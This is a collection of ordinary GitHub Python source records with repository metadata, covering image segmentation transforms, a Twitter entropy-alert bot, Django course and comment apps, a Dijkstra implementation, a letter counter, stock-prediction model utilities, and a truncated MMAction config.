0), (0, self.sa_slices_num - sax_num), (0, 0), (0, 0)))\n elif sax_num > self.sa_slices_num:\n start_idx = np.random.randint(0, sax_num - self.sa_slices_num)\n sax_mask = sax_mask[:, start_idx:(start_idx + self.sa_slices_num)]\n sax_image = sax_image[:, start_idx:(start_idx + self.sa_slices_num)]\n\n sax_new_mask = np.zeros_like(sax_mask)\n sax_new_mask[sax_mask<0.5] = 1\n\n if self.hist_clamp_enable:\n sax_image = self.hist_clamp(sax_image)\n\n return {'image': sax_image.astype(\"float\"), 'mask': sax_new_mask, 'misc': misc}\n\n def hist_clamp(self, image):\n new_image = []\n bd_up = 99.9\n bd_low = 0.1\n for i in range(image.shape[0]):\n sub_img = image[i]\n sub_img[sub_img > np.percentile(sub_img, bd_up)] = np.percentile(sub_img, bd_up)\n sub_img[sub_img < np.percentile(sub_img, bd_low)] = np.percentile(sub_img, bd_low)\n new_image.append(sub_img)\n new_image = np.stack(new_image, axis=0)\n return new_image\n\n\n\n","repo_name":"tommy-qichang/DSL_All_Code","sub_path":"segmentation/data_loader/my_transforms/exp_dt_to_seg.py","file_name":"exp_dt_to_seg.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"62"} +{"seq_id":"9634642822","text":"import requests\nimport json\nimport time\nimport redis\nimport tweepy\nimport os\nimport numpy as np\n\nfrom tweepy.error import TweepError\n\nconn = redis.Redis()\n# alert if entropy is less than this many standard deviations below the mean\nzscore_threshold = -1.5\n# API base url\nurl = \"http://{}:5000\".format(os.environ[\"API_BASE_URL\"])\n\ndef zscore(entropy):\n '''\n Given an entropy value, returns its distance from the mean entropy as\n the number of standard deviations.\n '''\n keys = conn.keys(\"entropy:*\")\n entropy_vals = np.array([float(val) for val in conn.mget(keys)])\n mean_entropy = np.mean(entropy_vals)\n std_dev = np.std(entropy_vals)\n return (entropy - mean_entropy)/std_dev\n\ndef below_entropy_threshold(entropy):\n '''\n Given an entropy value, returns whether it is less than the threshold\n number of standard deviations away from the mean entropy.\n '''\n return zscore(entropy) < zscore_threshold \n\ndef get_most_retweeted():\n '''\n Returns the original @nytimes status, published within \n 2 to 6 hours ago, that has been retweeted the most up to this point.\n '''\n r = requests.get(\"{}/distribution\".format(url))\n dist = json.loads(r.text)\n max_mass = -1\n most_retweeted = None\n for status_text, num_retweets in dist.iteritems():\n if num_retweets > max_mass:\n max_mass = num_retweets\n most_retweeted = status_text\n return most_retweeted\n\nif __name__ == \"__main__\":\n CONSUMER_KEY = os.environ[\"BOT_CONSUMER_KEY\"]\n CONSUMER_SECRET = os.environ[\"BOT_CONSUMER_SECRET\"]\n ACCESS_TOKEN = os.environ[\"BOT_ACCESS_TOKEN\"]\n ACCESS_TOKEN_SECRET = os.environ[\"BOT_ACCESS_TOKEN_SECRET\"]\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n twitter_api_wrapper = tweepy.API(auth)\n \n while True:\n # make call to entropy API endpoint\n r = requests.get(\"{}/entropy\".format(url))\n entropy = json.loads(r.text)[\"entropy\"]\n # save entropy observation in redis\n conn.set(\"entropy:{}\".format(time.time()), entropy)\n if below_entropy_threshold(entropy):\n most_retweeted_text = get_most_retweeted()\n tweet_text = \"Entropy < {thres} stddev. Most likely RT: {text}\".format(thres=zscore_threshold, text=most_retweeted_text)\n while True:\n try:\n twitter_api_wrapper.update_status(tweet_text)\n break\n except TweepError as e:\n err_code = e[0][0]['code']\n # duplicate msg\n if err_code == 187:\n modified_tweet_text = \"t={curtime}: Entropy < {thres} stddev. Most likely RT same as previous.\".format(curtime=time.time(), thres=zscore_threshold)\n # status exceeds 140\n elif err_code == 186:\n nyt_url = None\n for token in most_retweeted_text.split(\" \"):\n if token.find(\"http://\") > -1 or token.find(\"https://\") > -1:\n nyt_url = token\n if nyt_url:\n modified_tweet_text = \"Entropy < {thres} stddev. Most likely RT: {nyt_url}\".format(thres=zscore_threshold, nyt_url=nyt_url)\n else:\n modified_tweet_text = tweet_text[:120]\n tweet_text = modified_tweet_text\n time.sleep(30 * 60)\n","repo_name":"six5532one/retweets_of_nyt_distributions","sub_path":"alert_entropy_change.py","file_name":"alert_entropy_change.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"21535886151","text":"import csv\nimport matplotlib.pyplot as plt\n\nfilename=\"sitka_weather_07-2014.csv\"\nwith open(filename) as file:\n content = csv.reader(file)\n # first Row\n header_row = next(content)\n\n hight = []\n for row in content:\n # parse int type\n hight.append(int(row[1]))\n\nplt.plot(hight,color='red')\nplt.show()","repo_name":"Whatsupyuan/python_ws","sub_path":"16-AnalysisData/05_csv_graph.py","file_name":"05_csv_graph.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"5169705568","text":"import tensorflow as tf\n\n\nin_path = \"../model/pb/mobileFaceNet_pts.pb\"\nout_path = \"../model/pb/mobileFaceNet_pts.tflite\"\n\ninput_tensor_name = [\"input\"]\ninput_tensor_shape = {\"input\": [1, 112, 112, 3]}\nclasses_tensor_name = [\"embeddings\"]\n\nconverter = tf.lite.TFLiteConverter.from_frozen_graph(in_path, input_tensor_name,\n classes_tensor_name, input_shapes=input_tensor_shape)\n\nwith open(out_path, \"wb\") as f:\n f.write(converter.convert())\n\n","repo_name":"FancyXun/federated_app","sub_path":"src/main/python/face_rec/utils/lite_converter.py","file_name":"lite_converter.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"11547294688","text":"from domain.values.slide_images import SlideImages\nfrom domain.values.timelines import Timeline, Timelines\nfrom domain.values.video import Video\n\n\ndef classify_all_frame(video: Video, slide_images: SlideImages, distance, on_progress) -> Timelines:\n timelines = Timelines()\n with video:\n for time, frame in video.timed_frames:\n slide_number = __classify_a_frame(frame, slide_images, distance)\n timelines.append(Timeline(time, slide_number))\n progress = time / video.time_length\n on_progress(progress)\n return timelines\n\n\ndef __classify_a_frame(frame, slide_images: SlideImages, distance) -> int:\n distances = list(map(lambda slide_image: distance(frame, slide_image),\n slide_images))\n return __argmin(distances)\n\n\ndef __argmin(l: list):\n return min(range(len(l)), key=lambda i: l[i])\n","repo_name":"SmoothieTeam/Sli-Sync","sub_path":"algorithm/domain/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"14289098780","text":"from .models import Comment\r\n\r\n\r\nfrom django.forms import ModelForm\r\n\r\nclass CommentForm(ModelForm):\r\n class Meta:\r\n model = Comment\r\n fields = [\"body\"]\r\n labels = {\r\n \"body\": \"\"\r\n }\r\n\r\n def __init__(self, *args, **kwargs):\r\n super(CommentForm, self).__init__(*args, **kwargs)\r\n\r\n self.fields[\"body\"].widget.attrs.update({\"class\":\"comment-text-field\"})\r\n self.fields[\"body\"].widget.attrs.update({\"placeholder\":\"Add a comment...\"})\r\n","repo_name":"AdrianHorvath8/ITube","sub_path":"videos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"24101376808","text":"from rest_framework import generics, exceptions\nfrom rest_framework.views import APIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.response import Response\n\nfrom university.serializers import (\n EmployeeSerializer,\n StudentSerializer,\n SubjectSerializer,\n TeacherSerializer,\n CourseSerializer,\n LessonSerializer\n )\nfrom university.permissions import SchoolAdministrators, Teachers, Students\nfrom university import models\n\n\nclass ExibitionView(APIView):\n permission_classes = (AllowAny,)\n def get(self, request):\n info = {\n \"project_name\": \"ead-courses-api\",\n \"author\": \"Gabriel Mendes\",\n \"description\": \"API for a fictional ead plataform.You can learn more on th readme on github.You will find all th routes over there\",\n \"repo\": \"https://github.com/gbr-mendes/ead-courses-api\",\n \"users\": {\n \"employee\": {\n \"email\": \"nelsondanilosamuelpeixoto_@dlh.de\",\n \"password\": \"password\"\n },\n \"teacher\":{\n \"email\": \"valentinanairelzasilveira-98@babo.adv.br\",\n \"password\": \"password\"\n },\n \"student\":{\n \"email\": \"eelianebrendaalves@ssala.com.br\",\n \"password\": \"password\"\n }\n\n },\n \"ATENTION\": \"The system uses token authentication. You can generate the token at https://ead-courses-api.herokuapp.com/api/accounts/token/ . I suggest you use an extesion for you browser like modheader to pass the token on your requests\"\n }\n return Response(info)\n\n\n\nclass CreateListEmployeeAPIView(generics.ListCreateAPIView):\n \"\"\"Create a new employee in the system\"\"\"\n serializer_class = EmployeeSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Employee.objects.all()\n\n\nclass RetriveEmployeeAPIView(\n generics.DestroyAPIView,\n generics.RetrieveUpdateAPIView\n ):\n \"\"\"Retrive an especific employee\"\"\"\n serializer_class = EmployeeSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Employee.objects.all()\n\n\nclass CreateTeacherAPIView(generics.ListCreateAPIView):\n \"\"\"Create a new Teacher in the system\"\"\"\n serializer_class = TeacherSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Teacher.objects.all()\n\n\nclass RetriveTeacherAPIView(\n generics.RetrieveUpdateAPIView,\n generics.DestroyAPIView\n ):\n \"\"\"Retrive an especific teacher\"\"\"\n serializer_class = TeacherSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Teacher.objects.all()\n\n\nclass CreateStudentAPIView(generics.ListCreateAPIView):\n \"\"\"Create a new student in the system\"\"\"\n serializer_class = StudentSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Student.objects.all()\n\n\nclass RetriveStudentAPIView(\n generics.RetrieveUpdateAPIView,\n generics.DestroyAPIView\n ):\n serializer_class = StudentSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Student.objects.all()\n\n\nclass CreateCourseAPIView(generics.ListCreateAPIView):\n \"\"\"Create a new Course on de system\"\"\"\n serializer_class = CourseSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Course.objects.all()\n\n\nclass RetriveCourseAPIView(\n generics.RetrieveUpdateAPIView,\n generics.DestroyAPIView\n ):\n \"\"\"Retrive an especific course\"\"\"\n serializer_class = CourseSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Course.objects.all()\n\n\nclass CreateLessonAPIView(generics.CreateAPIView, generics.ListAPIView):\n \"\"\"Create a new lesson on the system\"\"\"\n serializer_class = LessonSerializer\n permission_classes = (Teachers,)\n queryset = models.Lesson.objects.all()\n\n\nclass WatchCourseAPIView(generics.RetrieveAPIView):\n \"\"\"Restrive a course to a student\"\"\"\n serializer_class = CourseSerializer\n permission_classes = (Students,)\n queryset = models.Course.objects.all()\n\n def get_object(self):\n try:\n queryset = super().get_object()\n user = self.request.user\n student = models.Student.objects.get(user=user)\n if student.course != queryset:\n raise exceptions.PermissionDenied(\n 'The student can only access the course in which he is enrolled',\n )\n\n return queryset\n except exceptions.PermissionDenied as e:\n raise e\n except:\n raise exceptions.PermissionDenied('Only students can watch a course')\n\n\nclass CreateSubjectAPIView(generics.ListCreateAPIView):\n serializer_class = SubjectSerializer\n permission_classes = (SchoolAdministrators,)\n queryset = models.Subject.objects.all()\n\n\nclass WatchLessonAPIVIew(generics.RetrieveAPIView):\n serializer_class = LessonSerializer\n permission_classes = (Students,)\n queryset = models.Lesson.objects.all()\n\n def get_object(self):\n queryset = super().get_object()\n try:\n student = models.Student.objects.get(\n user=self.request.user\n )\n course = student.course\n subjects = course.subjects.all()\n exists = False\n for subject in subjects:\n exists = models.Lesson.objects.filter(\n subject=subject\n ).exists()\n if exists:\n break\n\n if not exists:\n raise exceptions.PermissionDenied(\n 'The student can only access the lessons of the course in which he is enrolled'\n )\n return queryset\n except exceptions.PermissionDenied as e:\n raise e\n except:\n raise exceptions.PermissionDenied(\n 'Only a student can watch a lesson'\n )","repo_name":"gbr-mendes/ead-courses-api","sub_path":"app/university/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"9213544744","text":"import heapq\nimport sys\ninput = sys.stdin.readline\nINF = int(1e9)\n# 우선순위 힙 자료구조 활용으로 시간 ��잡도를 O(V^2)에서 O(ElogV)로 줄였다.\n\nn, m = map(int, input().split())\n\nstart = int(input())\n\ngraph = [[] for i in range(n+1)]\n\ndistance = [INF] * (n+1)\n\nfor _ in range(m):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\n \ndef dijkstra(start):\n q = [] # 큐를 활용할 리스트\n heapq.heappush(q, (0, start)) # (경로, 노드)\n distance[start] = 0\n while q:\n dist, now = heapq.heappop(q)\n \n if distance[now] < dist: # 처리된적 있는 노드면 그냥 생략\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(q, (cost, i[0])) # 개정된 거리와 그 노드를 넣음\n \ndijkstra(start)\n\nfor i in range(1, n+1):\n if distance[i] == INF:\n print(\"Infinity\")\n else:\n print(distance[i])","repo_name":"TaeKyuIm/coding_test","sub_path":"better_dijkstra.py","file_name":"better_dijkstra.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"30871732732","text":"import argparse\nimport requests\nimport multiprocessing\nfrom pathlib import Path\nimport os\nimport re\nfrom collections import Counter\nfrom time import time\nfrom urllib.parse import urljoin\n\n\ndef arguments():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--url\", help=\"url with articles.\", type=str)\n parser.add_argument(\n \"--num_processes\",\n help=\"number of processes to use.\",\n type=int,\n default=multiprocessing.cpu_count(),\n )\n\n return parser.parse_args()\n\n\ndef download_text(url):\n if Path(\"downloads/\" + url[0]).exists():\n return\n try:\n text = requests.get(url[1])\n with open(\"downloads/\" + url[0], \"w+\") as f:\n f.write(text.text)\n except requests.exceptions.RequestException as e:\n print(f\"Cannot download {url[0]}\")\n\n\ndef get_articles(path):\n if Path(path).exists():\n return [x.split()[0] for x in open(path, \"r\").readlines()]\n Exception(\"files.txt is not present.\")\n\n\ndef process_file(file):\n wanted = re.compile(\n \"([^-_a-zA-Z0-9!@#%&=,/'\\\";:~`\\$\\^\\*\\(\\)\\+\\[\\]\\.\\{\\}\\|\\?\\<\\>\\\\]+|[^\\s]+)\"\n )\n with open(\"downloads/\" + file) as file:\n content = Counter(list(wanted.sub(\" \", file.read())))\n return content\n\n\ndef write_result(result_file, letters):\n with open(result_file, \"w+\") as out:\n for key, val in letters.items():\n out.write(\"%s %s\\n\" % (key, val))\n\n\ndef merge_counts(counts):\n super_counter = Counter()\n for c in counts:\n super_counter.update(c)\n\n return super_counter\n\n\ndef download_process(url_files):\n download_text(url_files)\n return process_file(url_files[0])\n\n\ndef run():\n start = time()\n args = arguments()\n num_processes = args.num_processes\n url = args.url\n\n if not Path(\"downloads\").exists():\n os.makedirs(\"downloads\")\n\n file_url = [(file, urljoin(url, file)) for file in get_articles(\"files.txt\")]\n\n with multiprocessing.Pool(num_processes) as pool:\n res = pool.map(download_process, file_url)\n\n write_result(\"result.txt\", merge_counts(res))\n print(f\"Done in {int(time()-start)} seconds.\")\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"smaystr/rails_reactor","sub_path":"letter_counter/04/letter_counter.py","file_name":"letter_counter.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"72736288836","text":"# def mult(a, b):\n# if b == 1:\n# return a\n# else:\n# return a + mult(a, b-1)\n\n# print(mult(5,4))\n\n# a = 5\n# b = 4\n# while b > 1:\n# a = a + 5\n# b -= 1\n# print(a)\n\n# def fact(r):\n# res = 1\n# for i in range(1,r+1):\n# res *=i\n# return res\n\n# print(fact(5))\n\n# def fact(x, y=1):\n# if x == 1:\n# return y\n# else:\n# return fact(x-1, y*x)\n\n# print(fact(5))\n\ndef fact(x):\n if x == 1:\n return 1\n else:\n return x*fact(x-1)\nprint(fact(5))","repo_name":"SpoiledPotato/CU-Python","sub_path":"lecture-3/recursion.py","file_name":"recursion.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"35195001301","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom statsmodels.tools.eval_measures import rmse\nfrom sklearn.metrics import r2_score\nimport pandas as pd\n\ndef mape(actual, pred): \n actual, pred = np.array(actual), np.array(pred)\n return np.mean(np.abs((actual - pred) / actual)) * 100\n\ndef build_and_compile_model(input_dim=11):\n \"\"\"\n Function to build and compile DNN architecture\n \"\"\"\n model = keras.Sequential([\n layers.Dense(64, input_dim=input_dim, activation='relu'),\n layers.Dense(64, activation='relu'),\n layers.Dense(1)\n ])\n\n model.compile(loss='mean_squared_error',\n optimizer=tf.keras.optimizers.Adam(0.001))\n return model\n\ndef fit_model(model, epochs, batch_size, train_features, train_labels):\n \"\"\"\n Function to fit the DNN model with specified epochs and batch_size\n \"\"\"\n print(model.summary())\n history = model.fit(train_features,\n train_labels, validation_split=0.2,\n verbose=0, epochs=epochs, batch_size=batch_size)\n return history\n\ndef plot_loss(history):\n \"\"\"\n Function to plot history's loss\n \"\"\"\n plt.plot(history.history['loss'], label='loss')\n plt.plot(history.history['val_loss'], label='val_loss')\n plt.xlabel('Epoch')\n plt.ylabel('Error [Close]')\n plt.legend()\n plt.grid(True)\n plt.show()\n\ndef genPredictions(model,ori_df,test_features,train_len):\n \"\"\"\n Function to generate predictions with the developed model\n Returns predictions dataframe with Pred and Actual columns\n \"\"\"\n predictions = model.predict(test_features).flatten()\n actual_close = ori_df[['Close']]\n \n act = pd.DataFrame(actual_close.iloc[train_len:, 0])\n \n predictions = pd.DataFrame(predictions)\n predictions.reset_index(drop=True, inplace=True)\n predictions.index = test_features.index\n predictions['Actual'] = act['Close']\n predictions.rename(columns={0:'Pred'}, inplace=True)\n return predictions\n\ndef plotPredAct(predictions_df):\n \"\"\"\n Function to plot predictions versus actual values\n \"\"\"\n predictions_df['Actual'].plot(figsize=(20,8), legend=True, color='blue')\n predictions_df['Pred'].plot(legend=True, color='red', figsize=(20,8))\n\ndef inversePredsAndAct(predictions_df, close_scaler, test_labels):\n \"\"\"\n Function to inverse transform the predicted and actual values\n \"\"\"\n inversed_pred = close_scaler.inverse_transform(np.array(predictions_df['Pred']).reshape(-1,1))\n inversed_act = close_scaler.inverse_transform(np.array(predictions_df['Actual']).reshape(-1,1))\n \n inversed = pd.DataFrame(inversed_pred)\n inversed['Actual'] = inversed_act\n inversed.rename({0:'Pred'}, axis=1, inplace=True)\n inversed.index = test_labels.index\n \n return inversed\n\ndef plotErrorHist(inversed_df):\n \"\"\"\n Function to plot error histogram\n \"\"\"\n error = inversed_df['Pred'] - inversed_df['Actual']\n plt.hist(error, bins=25)\n plt.xlabel('Prediction Error [Close]')\n _ = plt.ylabel('Count')\n\ndef evaluateModel(inversed_df):\n rmse_ = rmse(inversed_df['Pred'], inversed_df['Actual'])\n mape_ = mape(inversed_df['Actual'], inversed_df['Pred'])\n rsquared_ = r2_score(inversed_df['Actual'], inversed_df['Pred'])\n return rmse_, mape_, rsquared_","repo_name":"MLDSAI-TUBES/stock-pred-api-rsi-mfi","sub_path":"experiments/FFNN/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"7976037238","text":"from comments.forms import CommentForm\r\nfrom comments.models import Comment\r\nfrom django.conf import settings\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.core import serializers\r\nfrom django.core.urlresolvers import reverse\r\nfrom django.http import HttpResponse, HttpResponseRedirect\r\nfrom django.shortcuts import get_object_or_404, render_to_response\r\nfrom django.template import loader, RequestContext, Template\r\nfrom follows.utils import follow_user\r\nfrom notifications.utils import notify\r\nfrom readings.models import Note\r\nfrom replies.forms import ReplyForm\r\nfrom skimreads.utils import add_csrf\r\nfrom users.utils import add_rep, del_rep\r\n\r\nimport json\r\n\r\n@login_required\r\ndef new(request, pk):\r\n note = get_object_or_404(Note, pk=pk)\r\n if request.method == 'POST':\r\n form = CommentForm(request.POST)\r\n if form.is_valid():\r\n comment = form.save(commit=False)\r\n comment.note = note\r\n comment.user = request.user\r\n comment.save()\r\n # add rep\r\n add_rep(request, c=comment)\r\n # create notification\r\n notify(comment=comment)\r\n d = {\r\n 'comment': comment,\r\n 'comment_form': CommentForm(),\r\n 'note': note,\r\n 'reply_form': ReplyForm(),\r\n 'static': settings.STATIC_URL,\r\n }\r\n comment_form = loader.get_template('comments/comment_form.html')\r\n comment_temp = loader.get_template('comments/comment.html')\r\n context = RequestContext(request, add_csrf(request, d))\r\n data = {\r\n 'comment': comment_temp.render(context),\r\n 'comment_count': note.comment_count(),\r\n 'comment_form': comment_form.render(context),\r\n 'comment_pk': comment.pk,\r\n 'note_pk': note.pk,\r\n }\r\n return HttpResponse(json.dumps(data), mimetype='application/json')\r\n return HttpResponseRedirect(reverse('readings.views.detail', \r\n args=[reading.slug]))\r\n\r\n@login_required\r\ndef delete(request, pk):\r\n \"\"\"Delete a comment.\"\"\"\r\n comment = get_object_or_404(Comment, pk=pk)\r\n note = comment.note\r\n if request.method == 'POST':\r\n if request.POST.get('delete') == str(comment.pk):\r\n if comment.user == request.user or request.user.is_staff:\r\n data = { \r\n 'note_pk': note.pk,\r\n 'pk': comment.pk \r\n }\r\n # del rep\r\n del_rep(request, c=comment)\r\n comment.delete()\r\n data['comment_count'] = note.comment_count()\r\n return HttpResponse(json.dumps(data), \r\n mimetype='application/json')\r\n return HttpResponseRedirect(reverse('readings.views.detail', \r\n args=[comment.reading.slug]))","repo_name":"tommydangerous/skimreads","sub_path":"skimreads/comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31183410167","text":"import os\r\n\r\nfrom django.test import TestCase\r\nfrom django.urls import reverse\r\nfrom django.core.exceptions import ValidationError\r\nfrom rest_framework.test import APITestCase, APIClient\r\nfrom rest_framework import status\r\n\r\nfrom categories.models import Category\r\nfrom users.constants import FIREBASE_UID_LENGTH\r\nfrom utils import create_random_string\r\nfrom users.models import User\r\n\r\nfrom random import randint\r\n\r\n# Create your tests here.\r\nclass TestCategoriesModel(TestCase):\r\n\r\n def setUp(self):\r\n self.a_user = User.objects.create(firebase_uid=create_random_string(FIREBASE_UID_LENGTH))\r\n\r\n def test_category_is_created_for_user(self):\r\n Category.objects.create(user=self.a_user, name='Education', material_ui_icon_name='School')\r\n self.assertEqual(len(Category.categories_from_user(self.a_user)), 6)\r\n\r\n def test_category_from_user_is_deleted(self):\r\n category_created = Category.objects.create(user=self.a_user, name='Car Maintainment', material_ui_icon_name='CarRepair')\r\n category_created.delete()\r\n self.assertEqual(len(Category.categories_from_user(self.a_user)), 5)\r\n\r\n def test_created_category_is_not_static(self):\r\n category_created = Category.objects.create(user=self.a_user, name='Storage', material_ui_icon_name='SdCard')\r\n self.assertFalse(category_created.static)\r\n\r\n def test_a_default_categories_is_static(self):\r\n category_created = Category.objects.all()[randint(0, Category.objects.all().count()-1)]\r\n self.assertTrue(category_created.static)\r\n\r\n def test_two_categories_with_same_name_should_not_be_created_for_a_user(self):\r\n Category.objects.create(user=self.a_user, name='A Category', material_ui_icon_name='ShuffleRounded')\r\n\r\n with self.assertRaisesMessage(ValidationError, \"User cannot create another repeated category\"):\r\n Category.objects.create(user=self.a_user, name='A Category', material_ui_icon_name='Car')\r\n\r\n def test_category_dictionary_serialization(self):\r\n category_created = Category.objects.create(user=self.a_user, name='Storage', material_ui_icon_name='SdCard')\r\n self.assertEqual(category_created.as_dict['id'], category_created.id)\r\n self.assertEqual(category_created.as_dict['name'], 'Storage')\r\n self.assertEqual(category_created.as_dict['material_ui_icon_name'], 'SdCard')\r\n self.assertEqual(category_created.as_dict['color'], category_created.color)\r\n self.assertFalse(category_created.as_dict['static'])\r\n","repo_name":"lucasSaavedra123/los-changos-back-end","sub_path":"categories/tests_models.py","file_name":"tests_models.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"22449184610","text":"from typing import Tuple, Sequence, Iterator, List\nfrom scipy.stats import norm\nimport numpy as np\nfrom rl.function_approx import LinearFunctionApprox, DNNApprox, \\\n AdamGradient, DNNSpec\nfrom itertools import islice\nfrom rl.gen_utils.plot_funcs import plot_list_of_curves\n\nTriple = Tuple[float, float, float]\nAug_Triple = Tuple[float, float, float, float]\nDataSeq = Sequence[Tuple[Triple, float]]\n\n\ndef example_model_data_generator() -> Iterator[Tuple[Triple, float]]:\n\n coeffs: Aug_Triple = (2., 10., 4., -6.)\n d = norm(loc=0., scale=0.3)\n\n while True:\n pt: np.ndarray = np.random.randn(3)\n x_val: Triple = (pt[0], pt[1], pt[2])\n y_val: float = coeffs[0] + np.dot(coeffs[1:], pt) + \\\n d.rvs(size=1)[0]\n yield (x_val, y_val)\n\n\ndef data_seq_generator(\n data_generator: Iterator[Tuple[Triple, float]],\n num_pts: int\n) -> Iterator[DataSeq]:\n while True:\n pts: DataSeq = list(islice(data_generator, num_pts))\n yield pts\n\n\ndef feature_functions():\n return [lambda _: 1., lambda x: x[0], lambda x: x[1], lambda x: x[2]]\n\n\ndef adam_gradient():\n return AdamGradient(\n learning_rate=0.1,\n decay1=0.9,\n decay2=0.999\n )\n\n\ndef get_linear_model() -> LinearFunctionApprox[Triple]:\n ffs = feature_functions()\n ag = adam_gradient()\n return LinearFunctionApprox.create(\n feature_functions=ffs,\n adam_gradient=ag,\n regularization_coeff=0.,\n direct_solve=True\n )\n\n\ndef get_dnn_model() -> DNNApprox[Triple]:\n ffs = feature_functions()\n ag = adam_gradient()\n\n def relu(arg: np.ndarray) -> np.ndarray:\n return np.vectorize(lambda x: x if x > 0. else 0.)(arg)\n\n def relu_deriv(res: np.ndarray) -> np.ndarray:\n return np.vectorize(lambda x: 1. if x > 0. else 0.)(res)\n\n def identity(arg: np.ndarray) -> np.ndarray:\n return arg\n\n def identity_deriv(res: np.ndarray) -> np.ndarray:\n return np.ones_like(res)\n\n ds = DNNSpec(\n neurons=[2],\n bias=True,\n hidden_activation=relu,\n hidden_activation_deriv=relu_deriv,\n output_activation=identity,\n output_activation_deriv=identity_deriv\n )\n\n return DNNApprox.create(\n feature_functions=ffs,\n dnn_spec=ds,\n adam_gradient=ag,\n regularization_coeff=0.05\n )\n\n\nif __name__ == '__main__':\n training_num_pts: int = 1000\n test_num_pts: int = 10000\n training_iterations: int = 200\n data_gen: Iterator[Tuple[Triple, float]] = example_model_data_generator()\n training_data_gen: Iterator[DataSeq] = data_seq_generator(\n data_gen,\n training_num_pts\n )\n test_data: DataSeq = list(islice(data_gen, test_num_pts))\n\n direct_solve_lfa: LinearFunctionApprox[Triple] = \\\n get_linear_model().solve(next(training_data_gen))\n direct_solve_rmse: float = direct_solve_lfa.rmse(test_data)\n print(f\"Linear Model Direct Solve RMSE = {direct_solve_rmse:.3f}\")\n print(\"-----------------------------\")\n\n print(\"Linear Model SGD\")\n print(\"----------------\")\n linear_model_rmse_seq: List[float] = []\n for lfa in islice(\n get_linear_model().iterate_updates(training_data_gen),\n training_iterations\n ):\n this_rmse: float = lfa.rmse(test_data)\n linear_model_rmse_seq.append(this_rmse)\n iter: int = len(linear_model_rmse_seq)\n print(f\"Iteration {iter:d}: RMSE = {this_rmse:.3f}\")\n\n print(\"DNN Model SGD\")\n print(\"-------------\")\n dnn_model_rmse_seq: List[float] = []\n for dfa in islice(\n get_dnn_model().iterate_updates(training_data_gen),\n training_iterations\n ):\n this_rmse: float = dfa.rmse(test_data)\n dnn_model_rmse_seq.append(this_rmse)\n iter: int = len(dnn_model_rmse_seq)\n print(f\"Iteration {iter:d}: RMSE = {this_rmse:.3f}\")\n\n x_vals = range(training_iterations)\n plot_list_of_curves(\n list_of_x_vals=[x_vals, x_vals],\n list_of_y_vals=[linear_model_rmse_seq, dnn_model_rmse_seq],\n list_of_colors=[\"b-\", \"r--\"],\n list_of_curve_labels=[\"Linear Model\", \"Deep Neural Network Model\"],\n x_label=\"Iterations of Gradient Descent\",\n y_label=\"Root Mean Square Error\",\n title=\"RMSE across Iterations of Gradient Descent\"\n )\n","repo_name":"TikhonJelvis/RL-book","sub_path":"rl/chapter5/func_approx_simple_examples.py","file_name":"func_approx_simple_examples.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","stars":410,"dataset":"github-code","pt":"83"} +{"seq_id":"25249679129","text":"_base_ = ['./i3d_r50_dense_32x2x1_50e_ucf101_rgb_ae_edl_dis.py']\n\n# model\nmodel = dict(\n type='YZRecognizer3D',\n backbone=dict(\n type='ResNet3d',\n pretrained2d=True,\n pretrained='torchvision://resnet50',\n depth=50,\n conv1_kernel=(5, 7, 7),\n conv1_stride_t=2,\n pool1_stride_t=2,\n conv_cfg=dict(type='Conv3d'),\n norm_eval=False,\n inflate=((1, 1, 1), (1, 0, 1, 0), (1, 0, 1, 